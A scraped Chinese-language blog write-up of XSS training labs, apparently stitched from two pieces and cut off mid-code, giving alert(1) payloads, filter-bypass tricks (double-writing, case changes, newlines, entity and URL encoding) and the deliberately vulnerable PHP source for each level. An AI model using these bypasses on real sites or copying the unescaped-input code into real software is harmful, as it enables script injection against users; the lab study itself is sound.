data-src="https://c3ngh-blog.oss-cn-hangzhou.aliyuncs.com/img/image-20240204151017389.png" alt="image-20240204151017389" ></a></p> <p><strong>答案:</strong></p> <figure class="highlight html"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line"><span class="tag"><<span class="name">a</span> <span class="attr">href</span>=<span class="string">javascript:alert&#40;1&#41;</span>></span>123<span class="tag"></<span class="name">a</span>></span></span><br></pre></td></tr></table></figure> </li> <li> <h4 id="0x05">0x05</h4> <p>HTML的注释有两种方式:</p> <figure class="highlight html"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br></pre></td><td class="code"><pre><span class="line"><span class="comment"><!-- 注释内容 --></span></span><br><span class="line"><span class="comment"><!-- 注释内容 --!></span></span><br></pre></td></tr></table></figure> <p><a href="https://c3ngh-blog.oss-cn-hangzhou.aliyuncs.com/img/image-20240204151215313.png"><img lazyload alt="image" data-src="https://c3ngh-blog.oss-cn-hangzhou.aliyuncs.com/img/image-20240204151215313.png" alt="image-20240204151215313" ></a></p> <p><strong>答案:<code>--!><script>alert(1)</script></code></strong></p> </li> <li> <h4 id="0x06">0x06</h4> <p>正则表达式匹配了:<strong>auto</strong> 、<strong>以on开头且以=结尾的字符串</strong>、 <strong>></strong></p> <p>所以过滤了autofocus和onerror等事件,以及防止input标签被闭合。</p> <p><a href="https://c3ngh-blog.oss-cn-hangzhou.aliyuncs.com/img/image-20240204152604165.png"><img lazyload alt="image" data-src="https://c3ngh-blog.oss-cn-hangzhou.aliyuncs.com/img/image-20240204152604165.png" alt="image-20240204152604165" ></a></p> <p>可以通过换行<code>%0A</code>来绕过匹配,<strong>答案:</strong></p> <figure class="highlight txt"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br></pre></td><td class="code"><pre><span class="line">type="image" src="" onerror</span><br><span class="line">=alert(1)</span><br><span class="line"></span><br><span class="line">onclick</span><br><span class="line">=alert(1)</span><br></pre></td></tr></table></figure> </li> <li> <h4 id="0x07">0x07</h4> <p>本题主要利用html部分单标签可以解析,例如img标签</p> <p><a href="https://c3ngh-blog.oss-cn-hangzhou.aliyuncs.com/img/image-20240204153048091.png"><img lazyload alt="image" data-src="https://c3ngh-blog.oss-cn-hangzhou.aliyuncs.com/img/image-20240204153048091.png" alt="image-20240204153048091" ></a></p> <p><strong>答案:<code><img src="" onerror=alert(1)</code></strong></p> </li> <li> <h4 id="0x08">0x08</h4> <p>使用正则过滤</style>,可以多加一个空格或使用换行符造成正则逃逸。</p> <p><a href="https://c3ngh-blog.oss-cn-hangzhou.aliyuncs.com/img/image-20240204153220204.png"><img lazyload alt="image" data-src="https://c3ngh-blog.oss-cn-hangzhou.aliyuncs.com/img/image-20240204153220204.png" alt="image-20240204153220204" ></a></p> <p><strong>答案:<code></style ><img src=1 onerror="alert(1)"</code></strong></p> </li> <li> <h4 id="0x09">0x09</h4> <p>本题使用正则表达式白名单匹配固定网址,可在正确的网址后多加字符,再把前面的双引号闭合,再输入onerror错误事件</p> <p><a href="https://c3ngh-blog.oss-cn-hangzhou.aliyuncs.com/img/image-20240204153430571.png"><img lazyload alt="image" data-src="https://c3ngh-blog.oss-cn-hangzhou.aliyuncs.com/img/image-20240204153430571.png" alt="image-20240204153430571" ></a></p> <p><strong>答案:<code>https://www.segmentfault.com" onerror="alert(1)</code></strong></p> </li> <li> <h4 id="0x0A">0x0A</h4> <p>本题通过html转义, 过滤了所有可注入的关键字,经研究(看答案)可知,可直接引用指定网站下的目录文件来达到xss注入的目的,如在靶场的目录下有个j.js文件, 内有alert(1);代码, 直接调用即可注入,<strong>答案:<code>https://www.segmentfault.com.haozi.me/j.js</code></strong></p> <p>也可用url的@语法来进行跳转调用,例如<code>https://www.baidu.com@www.bing.com</code> ,最终会跳转到bing上,根据此原理可以在其他服务器上事先写好alert(1);并跳转执行。</p> </li> <li> <h4 id="0x0B">0x0B</h4> </li> <li> <h4 id="0x0C">0x0C</h4> </li> <li> <h4 id="0x0D">0x0D</h4> </li> <li> <h4 id="0x0E">0x0E</h4> </li> <li> <h4 id="0x0F">0x0F</h4> </li> <li> <h4 id="0x10">0x10</h4> </li> <li> <h4 id="0x11">0x11</h4> </li> <li> <h4 id="0x12">0x12</h4> </li> </ul>
  • 、等标签内均可插入标签来执行JavaScript恶意代码</p> <p>此处可以参考:<a class="link" href="https://blog.csdn.net/LYJ20010728/article/details/116462782" >XSS常见的触发标签<i class="fas fa-external-link-alt"></i></a></p> <p><a href="https://c3ngh-blog.oss-cn-hangzhou.aliyuncs.com/img/image-20240202143032203.png"><img lazyload alt="image" data-src="https://c3ngh-blog.oss-cn-hangzhou.aliyuncs.com/img/image-20240202143032203.png" alt="image-20240202143032203" ></a></p> <p><strong>答案:<code><script>alert(1)</script></code></strong></p> <p>源代码:</p> <figure class="highlight html"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br></pre></td><td class="code"><pre><span class="line"><span class="meta"><!DOCTYPE <span class="keyword">html</span>></span><span class="comment"><!--STATUS OK--></span><span class="tag"><<span class="name">html</span>></span></span><br><span class="line"><span class="tag"><<span class="name">head</span>></span></span><br><span class="line"><span class="tag"><<span class="name">meta</span> <span class="attr">http-equiv</span>=<span class="string">"content-type"</span> <span class="attr">content</span>=<span class="string">"text/html;charset=utf-8"</span>></span></span><br><span class="line"><span class="tag"><<span class="name">script</span>></span><span class="language-javascript"></span></span><br><span class="line"><span class="language-javascript"><span class="variable language_">window</span>.<span class="property">alert</span> = <span class="keyword">function</span>(<span class="params"></span>) </span></span><br><span class="line"><span class="language-javascript">{ </span></span><br><span class="line"><span class="language-javascript"><span class="title function_">confirm</span>(<span class="string">"完成的不错!"</span>);</span></span><br><span class="line"><span class="language-javascript"> <span class="variable language_">window</span>.<span class="property">location</span>.<span class="property">href</span>=<span class="string">"level2.php?keyword=test"</span>; </span></span><br><span class="line"><span class="language-javascript">}</span></span><br><span class="line"><span class="language-javascript"></span><span class="tag"></<span class="name">script</span>></span></span><br><span class="line"><span class="tag"><<span class="name">title</span>></span>欢迎来到level1<span class="tag"></<span class="name">title</span>></span></span><br><span class="line"><span class="tag"></<span class="name">head</span>></span></span><br><span class="line"><span class="tag"><<span class="name">body</span>></span></span><br><span class="line"><span class="tag"><<span class="name">h1</span> <span class="attr">align</span>=<span class="string">center</span>></span>欢迎来到level1<span class="tag"></<span class="name">h1</span>></span></span><br><span class="line"><span class="meta"><?php </span></span><br><span class="line"><span class="meta">ini_set("display_errors", 0);</span></span><br><span class="line"><span class="meta">$str = $_GET["name"];</span></span><br><span class="line"><span class="meta">echo "<h2 align=center>欢迎用户".$str."</h2>";//这里直接进行调用,根本没有过滤</span></span><br><span class="line"><span class="meta">?></span></span><br><span class="line"><span class="tag"><<span class="name">center</span>></span><span class="tag"><<span class="name">img</span> <span class="attr">src</span>=<span class="string">level1.png</span>></span><span class="tag"></<span class="name">center</span>></span></span><br><span class="line"><span class="meta"><?php </span></span><br><span class="line"><span class="meta">echo "<h3 align=center>payload的长度:".strlen($str)."</h3>";</span></span><br><span class="line"><span class="meta">?></span></span><br><span class="line"><span class="tag"></<span class="name">body</span>></span></span><br><span class="line"><span class="tag"></<span class="name">html</span>></span></span><br></pre></td></tr></table></figure> </li> <li> <p>Level 2</p> <p>可以尝试如Level 1的方法但是没有成功,再次查看源代码发现第一处的<>符号被html实体转义,只能从第二处进行注入,input标签不可内含script标签,故此处提前闭合input标签,构造一个新的script标签执行恶意代码。<a href="https://c3ngh-blog.oss-cn-hangzhou.aliyuncs.com/img/1706856310681.png"><img lazyload alt="image" data-src="https://c3ngh-blog.oss-cn-hangzhou.aliyuncs.com/img/1706856310681.png" alt="1706856310681" ></a></p> <p><strong>答案:<code>">\<script>alert(1)\</script></code></strong></p> <p>源代码:</p> <figure class="highlight html"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br><span class="line">28</span><br><span class="line">29</span><br><span class="line">30</span><br></pre></td><td class="code"><pre><span class="line"><span class="meta"><!DOCTYPE <span class="keyword">html</span>></span><span class="comment"><!--STATUS OK--></span><span class="tag"><<span class="name">html</span>></span></span><br><span class="line"><span class="tag"><<span class="name">head</span>></span></span><br><span class="line"><span class="tag"><<span class="name">meta</span> <span class="attr">http-equiv</span>=<span class="string">"content-type"</span> <span class="attr">content</span>=<span class="string">"text/html;charset=utf-8"</span>></span></span><br><span class="line"><span class="tag"><<span class="name">script</span>></span><span class="language-javascript"></span></span><br><span class="line"><span class="language-javascript"><span class="variable language_">window</span>.<span class="property">alert</span> = <span class="keyword">function</span>(<span class="params"></span>) </span></span><br><span class="line"><span class="language-javascript">{ </span></span><br><span class="line"><span class="language-javascript"><span class="title function_">confirm</span>(<span class="string">"完成的不错!"</span>);</span></span><br><span class="line"><span class="language-javascript"> <span class="variable language_">window</span>.<span class="property">location</span>.<span class="property">href</span>=<span class="string">"level3.php?writing=wait"</span>; </span></span><br><span class="line"><span class="language-javascript">}</span></span><br><span class="line"><span class="language-javascript"></span><span class="tag"></<span class="name">script</span>></span></span><br><span class="line"><span class="tag"><<span class="name">title</span>></span>欢迎来到level2<span class="tag"></<span class="name">title</span>></span></span><br><span class="line"><span class="tag"></<span class="name">head</span>></span></span><br><span class="line"><span class="tag"><<span class="name">body</span>></span></span><br><span class="line"><span class="tag"><<span class="name">h1</span> <span class="attr">align</span>=<span class="string">center</span>></span>欢迎来到level2<span class="tag"></<span class="name">h1</span>></span></span><br><span class="line"><span class="meta"><?php </span></span><br><span class="line"><span class="meta">ini_set("display_errors", 0);</span></span><br><span class="line"><span class="meta">$str = $_GET["keyword"];</span></span><br><span class="line"><span class="meta">echo "<h2 align=center>没有找到和".htmlspecialchars($str)."相关的结果.</h2>".'<center></span></span><br><span class="line"><span class="meta"><form action=level2.php method=GET></span></span><br><span class="line"><span class="meta"><input name=keyword value="'.$str.'"></span></span><br><span class="line"><span class="meta"><input type=submit name=submit value="搜索"/></span></span><br><span class="line"><span class="meta"></form></span></span><br><span class="line"><span class="meta"></center>';</span></span><br><span class="line"><span class="meta">?></span></span><br><span class="line"><span class="tag"><<span class="name">center</span>></span><span class="tag"><<span class="name">img</span> <span class="attr">src</span>=<span class="string">level2.png</span>></span><span class="tag"></<span class="name">center</span>></span></span><br><span class="line"><span class="meta"><?php </span></span><br><span class="line"><span class="meta">echo "<h3 align=center>payload的长度:".strlen($str)."</h3>";</span></span><br><span class="line"><span class="meta">?></span></span><br><span class="line"><span class="tag"></<span class="name">body</span>></span></span><br><span class="line"><span class="tag"></<span class="name">html</span>></span></span><br></pre></td></tr></table></figure> </li> <li> <p>Level 3</p> <p>如下图所示,本题过滤了<>和",经过测试发现 ’ 未被过滤,则可以在input标签内内联JavaScript代码</p> <p><a href="https://c3ngh-blog.oss-cn-hangzhou.aliyuncs.com/img/image-20240202144949589.png"><img lazyload alt="image" data-src="https://c3ngh-blog.oss-cn-hangzhou.aliyuncs.com/img/image-20240202144949589.png" alt="img" ></a></p> <p><strong>答案:<code>' onclick='alert(1)</code></strong>,然后使用鼠标单击该输入框即可</p> <p>源代码:</p> <figure class="highlight html"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br><span class="line">28</span><br><span class="line">29</span><br><span class="line">30</span><br></pre></td><td class="code"><pre><span class="line"><span class="meta"><!DOCTYPE <span class="keyword">html</span>></span><span class="comment"><!--STATUS OK--></span><span class="tag"><<span class="name">html</span>></span></span><br><span class="line"><span class="tag"><<span class="name">head</span>></span></span><br><span class="line"><span class="tag"><<span class="name">meta</span> <span class="attr">http-equiv</span>=<span class="string">"content-type"</span> <span class="attr">content</span>=<span class="string">"text/html;charset=utf-8"</span>></span></span><br><span class="line"><span class="tag"><<span class="name">script</span>></span><span class="language-javascript"></span></span><br><span class="line"><span class="language-javascript"><span class="variable language_">window</span>.<span class="property">alert</span> = <span class="keyword">function</span>(<span class="params"></span>) </span></span><br><span class="line"><span class="language-javascript">{ </span></span><br><span class="line"><span class="language-javascript"><span class="title function_">confirm</span>(<span class="string">"完成的不错!"</span>);</span></span><br><span class="line"><span class="language-javascript"> <span class="variable language_">window</span>.<span class="property">location</span>.<span class="property">href</span>=<span class="string">"level4.php?keyword=try harder!"</span>; </span></span><br><span class="line"><span class="language-javascript">}</span></span><br><span class="line"><span class="language-javascript"></span><span class="tag"></<span class="name">script</span>></span></span><br><span class="line"><span class="tag"><<span class="name">title</span>></span>欢迎来到level3<span class="tag"></<span class="name">title</span>></span></span><br><span class="line"><span class="tag"></<span class="name">head</span>></span></span><br><span class="line"><span class="tag"><<span class="name">body</span>></span></span><br><span class="line"><span class="tag"><<span class="name">h1</span> <span class="attr">align</span>=<span class="string">center</span>></span>欢迎来到level3<span class="tag"></<span class="name">h1</span>></span></span><br><span class="line"><span class="meta"><?php </span></span><br><span class="line"><span class="meta">ini_set("display_errors", 0);</span></span><br><span class="line"><span class="meta">$str = $_GET["keyword"];</span></span><br><span class="line"><span class="meta">echo "<h2 align=center>没有找到和".htmlspecialchars($str)."相关的结果.</h2>"."<center></span></span><br><span class="line"><span class="meta"><form action=level3.php method=GET></span></span><br><span class="line"><span class="meta"><input name=keyword value='".htmlspecialchars($str)."'></span></span><br><span class="line"><span class="meta"><input type=submit name=submit value=搜索 /></span></span><br><span class="line"><span class="meta"></form></span></span><br><span class="line"><span class="meta"></center>";</span></span><br><span class="line"><span class="meta">?></span></span><br><span class="line"><span class="tag"><<span class="name">center</span>></span><span class="tag"><<span class="name">img</span> <span class="attr">src</span>=<span class="string">level3.png</span>></span><span class="tag"></<span class="name">center</span>></span></span><br><span class="line"><span class="meta"><?php </span></span><br><span class="line"><span class="meta">echo "<h3 align=center>payload的长度:".strlen($str)."</h3>";</span></span><br><span class="line"><span class="meta">?></span></span><br><span class="line"><span class="tag"></<span class="name">body</span>></span></span><br><span class="line"><span class="tag"></<span class="name">html</span>></span></span><br></pre></td></tr></table></figure> </li> <li> <p>Level 4</p> <p>与Level 3相同,注意使用的是双引号即可</p> <p><a href="https://c3ngh-blog.oss-cn-hangzhou.aliyuncs.com/img/image-20240202145526384.png"><img lazyload alt="image" data-src="https://c3ngh-blog.oss-cn-hangzhou.aliyuncs.com/img/image-20240202145526384.png" alt="image-20240202145526384" ></a></p> <p><strong>答案:<code>" onclick="alert(1)</code></strong></p> <p>源代码:</p> <figure class="highlight php"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br></pre></td><td class="code"><pre><span class="line"><span class="meta"><?php</span> </span><br><span class="line"><span class="title function_ invoke__">ini_set</span>(<span class="string">"display_errors"</span>, <span class="number">0</span>);</span><br><span class="line"><span class="variable">$str</span> = <span class="variable">$_GET</span>[<span class="string">"keyword"</span>];</span><br><span class="line"><span class="variable">$str2</span>=<span class="title function_ invoke__">str_replace</span>(<span class="string">">"</span>,<span class="string">""</span>,<span class="variable">$str</span>);</span><br><span class="line"><span class="variable">$str3</span>=<span class="title function_ invoke__">str_replace</span>(<span class="string">"<"</span>,<span class="string">""</span>,<span class="variable">$str2</span>);</span><br><span class="line"><span class="keyword">echo</span> <span class="string">"<h2 align=center>没有找到和"</span>.<span class="title function_ invoke__">htmlspecialchars</span>(<span class="variable">$str</span>).<span class="string">"相关的结果.</h2>"</span>.<span class="string">'<center></span></span><br><span class="line"><span class="string"><form action=level4.php method=GET></span></span><br><span class="line"><span class="string"><input name=keyword value="'</span>.<span class="variable">$str3</span>.<span class="string">'"></span></span><br><span class="line"><span class="string"><input type=submit name=submit value=搜索 /></span></span><br><span class="line"><span class="string"></form></span></span><br><span class="line"><span class="string"></center>'</span>;</span><br><span class="line"><span class="meta">?></span></span><br><span class="line"><center><img src=level4.png></center></span><br><span class="line"><span class="meta"><?php</span> </span><br><span class="line"><span class="keyword">echo</span> <span class="string">"<h3 align=center>payload的长度:"</span>.<span class="title function_ invoke__">strlen</span>(<span class="variable">$str3</span>).<span class="string">"</h3>"</span>;</span><br><span class="line"><span class="meta">?></span></span><br></pre></td></tr></table></figure> </li> <li> <p>Level 5</p> <p>本题在先前基础上过滤了关键字 on ,使得所有带on的方法都不可使用,故使用伪协议构造<a href=></p> <p><strong>若过滤是被替换为空,则可进行双写绕过,若是增加下划线等破坏原有结构则需使用其他方法绕过</strong></p> <p><a href="https://c3ngh-blog.oss-cn-hangzhou.aliyuncs.com/img/e51d1669fc381c1c00e22113b0f8bea.png"><img lazyload alt="image" data-src="https://c3ngh-blog.oss-cn-hangzhou.aliyuncs.com/img/e51d1669fc381c1c00e22113b0f8bea.png" alt="e51d1669fc381c1c00e22113b0f8bea" ></a></p> <p><strong>答案:<code>"><a href="[javascript:alert(1)](about:blank)">123</a>//</code></strong>,其中//为注释后面的内容</p> <p>源代码:</p> <figure class="highlight php"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br></pre></td><td class="code"><pre><span class="line"><span class="meta"><?php</span> </span><br><span class="line"><span class="title function_ invoke__">ini_set</span>(<span class="string">"display_errors"</span>, <span class="number">0</span>);</span><br><span class="line"><span class="variable">$str</span> = <span class="title function_ invoke__">strtolower</span>(<span class="variable">$_GET</span>[<span class="string">"keyword"</span>]);</span><br><span class="line"><span class="variable">$str2</span>=<span class="title function_ invoke__">str_replace</span>(<span class="string">"<script"</span>,<span class="string">"<scr_ipt"</span>,<span class="variable">$str</span>);</span><br><span class="line"><span class="variable">$str3</span>=<span class="title function_ invoke__">str_replace</span>(<span class="string">"on"</span>,<span class="string">"o_n"</span>,<span class="variable">$str2</span>);</span><br><span class="line"><span class="keyword">echo</span> <span class="string">"<h2 align=center>没有找到和"</span>.<span class="title function_ invoke__">htmlspecialchars</span>(<span class="variable">$str</span>).<span class="string">"相关的结果.</h2>"</span>.<span class="string">'<center></span></span><br><span class="line"><span class="string"><form action=level5.php method=GET></span></span><br><span class="line"><span class="string"><input name=keyword value="'</span>.<span class="variable">$str3</span>.<span class="string">'"></span></span><br><span class="line"><span class="string"><input type=submit name=submit value=搜索 /></span></span><br><span class="line"><span class="string"></form></span></span><br><span class="line"><span class="string"></center>'</span>;</span><br><span class="line"><span class="meta">?></span></span><br><span class="line"><center><img src=level5.png></center></span><br><span class="line"><span class="meta"><?php</span> </span><br><span class="line"><span class="keyword">echo</span> <span class="string">"<h3 align=center>payload的长度:"</span>.<span class="title function_ invoke__">strlen</span>(<span class="variable">$str3</span>).<span class="string">"</h3>"</span>;</span><br><span class="line"><span class="meta">?></span></span><br></pre></td></tr></table></figure> </li> <li> <p>Level 6</p> <p>本题用增加下划线的方式过滤href标签,可采用大小写绕过</p> <p><a href="https://c3ngh-blog.oss-cn-hangzhou.aliyuncs.com/img/image-20240202153331833.png"><img lazyload alt="image" data-src="https://c3ngh-blog.oss-cn-hangzhou.aliyuncs.com/img/image-20240202153331833.png" alt="image-20240202153331833" ></a></p> <p><strong>答案<code>"><a HREF="javascript:alert(1)">1</a>//</code></strong></p> <p>源代码:</p> <figure class="highlight php"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br></pre></td><td class="code"><pre><span class="line"><span class="meta"><?php</span> </span><br><span class="line"><span class="title function_ invoke__">ini_set</span>(<span class="string">"display_errors"</span>, <span class="number">0</span>);</span><br><span class="line"><span class="variable">$str</span> = <span class="variable">$_GET</span>[<span class="string">"keyword"</span>];</span><br><span class="line"><span class="variable">$str2</span>=<span class="title function_ invoke__">str_replace</span>(<span class="string">"<script"</span>,<span class="string">"<scr_ipt"</span>,<span class="variable">$str</span>);</span><br><span class="line"><span class="variable">$str3</span>=<span class="title function_ invoke__">str_replace</span>(<span class="string">"on"</span>,<span class="string">"o_n"</span>,<span class="variable">$str2</span>);</span><br><span class="line"><span class="variable">$str4</span>=<span class="title function_ invoke__">str_replace</span>(<span class="string">"src"</span>,<span class="string">"sr_c"</span>,<span class="variable">$str3</span>);</span><br><span class="line"><span class="variable">$str5</span>=<span class="title function_ invoke__">str_replace</span>(<span class="string">"data"</span>,<span class="string">"da_ta"</span>,<span class="variable">$str4</span>);</span><br><span class="line"><span class="variable">$str6</span>=<span class="title function_ invoke__">str_replace</span>(<span class="string">"href"</span>,<span class="string">"hr_ef"</span>,<span class="variable">$str5</span>);</span><br><span class="line"><span class="keyword">echo</span> <span class="string">"<h2 align=center>没有找到和"</span>.<span class="title function_ invoke__">htmlspecialchars</span>(<span class="variable">$str</span>).<span class="string">"相关的结果.</h2>"</span>.<span class="string">'<center></span></span><br><span class="line"><span class="string"><form action=level6.php method=GET></span></span><br><span class="line"><span class="string"><input name=keyword value="'</span>.<span class="variable">$str6</span>.<span class="string">'"></span></span><br><span class="line"><span class="string"><input type=submit name=submit value=搜索 /></span></span><br><span class="line"><span class="string"></form></span></span><br><span class="line"><span class="string"></center>'</span>;</span><br><span class="line"><span class="meta">?></span></span><br><span class="line"><center><img src=level6.png></center></span><br><span class="line"><span class="meta"><?php</span> </span><br><span class="line"><span class="keyword">echo</span> <span class="string">"<h3 align=center>payload的长度:"</span>.<span class="title function_ invoke__">strlen</span>(<span class="variable">$str6</span>).<span class="string">"</h3>"</span>;</span><br><span class="line"><span class="meta">?></span></span><br></pre></td></tr></table></figure> </li> <li> <p>Level 7</p> <p>本题以删除的方式过滤了href和script,可以使用双写绕过</p> <p><a href="https://c3ngh-blog.oss-cn-hangzhou.aliyuncs.com/img/image-20240202154250121.png"><img lazyload alt="image" data-src="https://c3ngh-blog.oss-cn-hangzhou.aliyuncs.com/img/image-20240202154250121.png" alt="image-20240202154250121" ></a></p> <p><strong>答案:<code>"><a HRHREFEF="javascrscriptipt:alert(1)">1</a>//</code></strong></p> <p>源代码:</p> <figure class="highlight php"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br></pre></td><td class="code"><pre><span class="line"><span class="meta"><?php</span> </span><br><span class="line"><span class="title function_ invoke__">ini_set</span>(<span class="string">"display_errors"</span>, <span class="number">0</span>);</span><br><span class="line"><span class="variable">$str</span> =<span class="title function_ invoke__">strtolower</span>( <span class="variable">$_GET</span>[<span class="string">"keyword"</span>]);</span><br><span class="line"><span class="variable">$str2</span>=<span class="title function_ invoke__">str_replace</span>(<span class="string">"script"</span>,<span class="string">""</span>,<span class="variable">$str</span>);</span><br><span class="line"><span class="variable">$str3</span>=<span class="title function_ invoke__">str_replace</span>(<span class="string">"on"</span>,<span class="string">""</span>,<span class="variable">$str2</span>);</span><br><span class="line"><span class="variable">$str4</span>=<span class="title function_ invoke__">str_replace</span>(<span class="string">"src"</span>,<span class="string">""</span>,<span class="variable">$str3</span>);</span><br><span class="line"><span class="variable">$str5</span>=<span class="title function_ invoke__">str_replace</span>(<span class="string">"data"</span>,<span class="string">""</span>,<span class="variable">$str4</span>);</span><br><span class="line"><span class="variable">$str6</span>=<span class="title function_ invoke__">str_replace</span>(<span class="string">"href"</span>,<span class="string">""</span>,<span class="variable">$str5</span>);</span><br><span class="line"><span class="keyword">echo</span> <span class="string">"<h2 align=center>没有找到和"</span>.<span class="title function_ invoke__">htmlspecialchars</span>(<span class="variable">$str</span>).<span class="string">"相关的结果.</h2>"</span>.<span class="string">'<center></span></span><br><span class="line"><span class="string"><form action=level7.php method=GET></span></span><br><span class="line"><span class="string"><input name=keyword value="'</span>.<span class="variable">$str6</span>.<span class="string">'"></span></span><br><span class="line"><span class="string"><input type=submit name=submit value=搜索 /></span></span><br><span class="line"><span class="string"></form></span></span><br><span class="line"><span class="string"></center>'</span>;</span><br><span class="line"><span class="meta">?></span></span><br><span class="line"><center><img src=level7.png></center></span><br><span class="line"><span class="meta"><?php</span> </span><br><span class="line"><span class="keyword">echo</span> <span class="string">"<h3 align=center>payload的长度:"</span>.<span class="title function_ invoke__">strlen</span>(<span class="variable">$str6</span>).<span class="string">"</h3>"</span>;</span><br><span class="line"><span class="meta">?></span></span><br></pre></td></tr></table></figure> </li> <li> <p>Level 8</p> <p>本题以添加下划线和html实体编码的形式绕过了href 、<> 、script 、"等字符,我们可以采用HTML实体编码+URL编码的形式在URL中直接写入,也可以在input标签内输入HTML实体编码。input标签也会默认对Unicode进行解码,所以本题可使用编码方式绕过。</p> <p><a href="https://c3ngh-blog.oss-cn-hangzhou.aliyuncs.com/img/image-20240202154853561.png"><img lazyload alt="image" data-src="https://c3ngh-blog.oss-cn-hangzhou.aliyuncs.com/img/image-20240202154853561.png" alt="image-20240202154853561" ></a></p> <p>相关网站:</p> <p><a class="link" href="https://config.net.cn/tools/HtmlEncode.html" >在线Html实体编码解码<i class="fas fa-external-link-alt"></i></a></p> <p><a class="link" href="http://www.esjson.com/urlEncode.html" >在线url网址编码解码<i class="fas fa-external-link-alt"></i></a></p> <p><a class="link" href="http://www.esjson.com/unicodeEncode.html" >在线Unicode编码转换工具)<i class="fas fa-external-link-alt"></i></a></p> <p><strong>答案:<code>javaScript:alert(1)</code></strong></p> <p>即:javascript:alert(1) #HTML实体编码->URL编码</p> <p>源代码:</p> <figure class="highlight php"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br></pre></td><td class="code"><pre><span class="line"><span class="meta"><?php</span> </span><br><span class="line"><span class="title function_ invoke__">ini_set</span>(<span class="string">"display_errors"</span>, <span class="number">0</span>);</span><br><span class="line"><span class="variable">$str</span> = <span class="title function_ invoke__">strtolower</span>(<span class="variable">$_GET</span>[<span class="string">"keyword"</span>]);</span><br><span class="line"><span class="variable">$str2</span>=<span class="title function_ invoke__">str_replace</span>(<span class="string">"script"</span>,<span class="string">"scr_ipt"</span>,<span class="variable">$str</span>);</span><br><span class="line"><span class="variable">$str3</span>=<span class="title function_ invoke__">str_replace</span>(<span class="string">"on"</span>,<span class="string">"o_n"</span>,<span class="variable">$str2</span>);</span><br><span class="line"><span class="variable">$str4</span>=<span class="title function_ invoke__">str_replace</span>(<span class="string">"src"</span>,<span class="string">"sr_c"</span>,<span class="variable">$str3</span>);</span><br><span class="line"><span class="variable">$str5</span>=<span class="title function_ invoke__">str_replace</span>(<span class="string">"data"</span>,<span class="string">"da_ta"</span>,<span class="variable">$str4</span>);</span><br><span class="line"><span class="variable">$str6</span>=<span class="title function_ invoke__">str_replace</span>(<span class="string">"href"</span>,<span class="string">"hr_ef"</span>,<span class="variable">$str5</span>);</span><br><span class="line"><span class="variable">$str7</span>=<span class="title function_ invoke__">str_replace</span>(<span class="string">'"'</span>,<span 